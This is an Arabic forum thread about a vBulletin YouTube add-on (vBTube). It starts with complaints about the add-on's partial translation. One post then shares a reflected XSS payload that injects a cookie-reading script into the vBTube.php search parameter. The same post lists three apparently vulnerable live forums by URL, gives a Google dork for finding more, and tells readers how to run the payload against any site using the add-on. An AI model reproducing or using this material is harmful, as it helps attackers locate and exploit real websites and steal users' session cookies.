vbtube هاك يوتيوب لمنتداك

[مصطفى الكردي]

هذا ايضا غير معرب كاملا
شوف تاكد منه
نورتم الموضوع وحياكم الله

[سيف الله]

أخي بارك الله بك ليس هناك أي تعريب فهاك هو بلغة الانجليزية
وعليك الدليل أخي


[BIMG]http://www.mwadah.com/attachment.php?attachment id=8363&stc=1&d=121565438 8[/BIMG]

[مصطفى الكردي]

المشكلة انه اللي معرب الهاك معربه على ملف التعريب واللي هو يتغير من منتدى لآخر وكان المفروض يغيره من الهاك نفسه بواسطة احدى البرامج الموجودة لتحرير نصوص الكودات
نورتم الموضوع وحياكم الله

[كنج صالح]

بسم الله الرحمن الرحيم

اخواني جايب لكم ثغرة جديدة واتمنى تنال اعجابكم

Vbulletin Tube (vBTube) XSS

الثغرة :

كود:
vBTube.php?do=search&sear ch=<script>alert(document .c ookie);</script>
اي منتدى مركب هاك اليوتيوب مصاب بها معظم المواقع وكثيرة

امثلة على مواقع مصابة :



كود:
http://www.ruhot.ru/forum/vBTube.php...ert(document.c ookie);%3C/script%3E


كود:
http://www.reno4x4.com/forum/vBTube....ert(document.c ookie);%3C/script%3E
كود:
http://odfmovies.com/Forums/vBTube.p...ert(document.c ookie);%3C/script%3E
طبعا اذا كان في ناس مركبين الهاك

انت بس ضيف الكود هذا بدل
www.xxx.com/vBTube.php
احذف vBTube.php
وحط هذا الكود

كود:
vBTube.php?do=search&sear ch=<script>alert(document .******);</script>

اتمنى تكون الفكرة وصلة

كود البحث في جوجل :


كود:
inurl:vBTube.php
في فراغ سويته في كلمة

كود:
c ookie
في فراغ بين حرف السي وحرف ال O شيل الفراغ بس



القنبلة المؤقتة

منقوووووووول

[محد مهتم]

يعطيك الف عافيه .... عربته انا بس وجدت مشكله بالترميز وهونت



الف شكر :)